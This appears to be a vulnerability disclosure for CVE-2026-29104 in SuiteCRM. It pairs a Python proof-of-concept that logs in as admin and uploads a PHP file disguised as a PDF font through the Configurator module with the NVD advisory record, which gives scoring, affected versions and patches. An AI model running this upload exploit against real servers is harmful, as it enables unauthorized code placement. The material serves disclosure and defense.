CVE-2026-29104

import requests # CVE-2026-29104 Proof of Concept # Description: Authenticated arbitrary file upload in SuiteCRM Configurator module. # Requirement: Administrator credentials. target = "http://localhost/suitecrm" username = "admin" password = "admin" session = requests.Session() # Step 1: Authenticate login_data = { "user_name": username, "user_password": password, "module": "Users", "action": "Login" } print("[*] Attempting to login...") session.post(f"{target}/index.php", data=login_data) # Step 2: Exploit File Upload # The vulnerability allows bypassing file type restrictions in the Configurator module. # Uploading a PHP webshell as a PDF font file. upload_url = f"{target}/index.php?module=Configurator&action=SaveFont" files = { "file_font": ("malicious.php", "<?php phpinfo(); ?>", "application/pdf") } data = { "upload": "true" } print("[*] Uploading malicious file...") response = session.post(upload_url, files=files, data=data) if response.status_code == 200: print("[+] File uploaded successfully. Check server.") else: print("[-] Upload failed.")

{"cve": {"id": "CVE-2026-29104", "sourceIdentifier": "[email protected]", "published": "2026-03-19T23:16:43.147", "lastModified": "2026-03-24T14:18:28.777", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Prior to versions 7.15.1 and 8.9.3, SuiteCRM contains an authenticated arbitrary file upload vulnerability in the Configurator module. An authenticated administrator can bypass intended file type restrictions when uploading PDF font files, allowing arbitrary files with attacker‑controlled filenames to be written to the server. Although the upload directory is not directly web‑accessible by default, this behavior breaks security boundaries and may enable further attacks when combined with other vulnerabilities or in certain deployment configurations. Versions 7.15.1 and 8.9.3 patch the issue."}, {"lang": "es", "value": "SuiteCRM es una aplicación de software de gestión de relaciones con el cliente (CRM) de código abierto y lista para empresas. Antes de las versiones 7.15.1 y 8.9.3, SuiteCRM contiene una vulnerabilidad de carga de archivos arbitraria autenticada en el módulo Configurator. Un administrador autenticado puede eludir las restricciones de tipo de archivo previstas al cargar archivos de fuentes PDF, permitiendo que archivos arbitrarios con nombres de archivo controlados por el atacante sean escritos en el servidor. Aunque el directorio de carga no es directamente accesible por web por defecto, este comportamiento rompe los límites de seguridad y puede habilitar ataques adicionales cuando se combina con otras vulnerabilidades o en ciertas configuraciones de despliegue. Las versiones 7.15.1 y 8.9.3 parchean el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.15.1", "matchCriteriaId": "73648654-E7F6-47CF-8E01-19BBFF737C99"}, {"vulnerable": true, "criteria": "cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.9.3", "matchCriteriaId": "C7E15DD3-A934-40A2-8B43-ABCCBB53CBCF"}]}]}], "references": [{"url": "https://docs.suitecrm.com/admin/releases/7.15.x", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/SuiteCRM/SuiteCRM/security/advisories/GHSA-5hx9-cmmx-26p3", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}